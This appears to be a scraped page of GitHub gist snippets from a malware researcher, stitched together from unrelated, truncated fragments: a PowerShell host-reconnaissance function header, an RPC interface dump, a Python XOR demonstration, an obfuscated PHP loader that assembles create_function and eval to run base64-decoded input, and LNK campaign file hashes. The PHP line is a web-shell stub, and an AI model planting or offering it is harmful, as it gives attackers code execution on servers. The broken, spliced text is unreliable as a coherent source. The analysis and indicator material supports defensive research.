function Get-ComputerDetail
{
<#
.SYNOPSIS
This script is used to get useful information from a computer.
Function: Get-ComputerDetail
Author: Joe Bialek, Twitter: @JosephBialek
Required Dependencies: None
@mattnotmax
mattnotmax / rpc_dump_rs5.txt
Created August 30, 2022 01:47 — forked from enigma0x3/rpc_dump_rs5.txt
RPC interfaces RS5
--------------------------------------------------------------------------------
<WinProcess "smss.exe" pid 368 at 0x5306908L>
64
[!!] Invalid rpcrt4 base: 0x0 vs 0x7ffec24f0000
--------------------------------------------------------------------------------
<WinProcess "csrss.exe" pid 472 at 0x5306e48L>
64
Interfaces :
Endpoints :
@mattnotmax
mattnotmax / multi-xor.py
Last active January 16, 2023 08:42
Step by step example of data being XORd with a multi-byte key
import binascii # This imports some functions used to convert data to hex values
data = "4d5a90000300000004000000ffff0000b8000000" # hex string of the first bytes of an executable file (notice the 4d 5a 'MZ' header)
text_key = "AABB" # hex string of the XOR key; it can be as long as you like
hex_data = binascii.unhexlify(data) # convert the hex string to a Python bytes object
hex_key = binascii.unhexlify(text_key) # convert the key hex string to a Python bytes object
print(f"\nXOR Key is {hex_key}")
<?php
$func="cr"."ea"."te_"."fun"."ction"; $x=$func("\$c","e"."v"."al"."('?
>'.base"."64"."_dec"."ode(\$c));");
$x("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
@mattnotmax
mattnotmax / LNK_IOCs.md
Last active May 28, 2020 11:39
Hashes from LNK file campaign

Original File

7eb4ea6277bd62653cc474cf1125165c9bdc43858811c0d88be25e2ec34bc14d

k.dll

95b2d037d67d77d313a7c97912674e365dcd98ceb6f8942ef3d450abf20bf472

screenshots.dll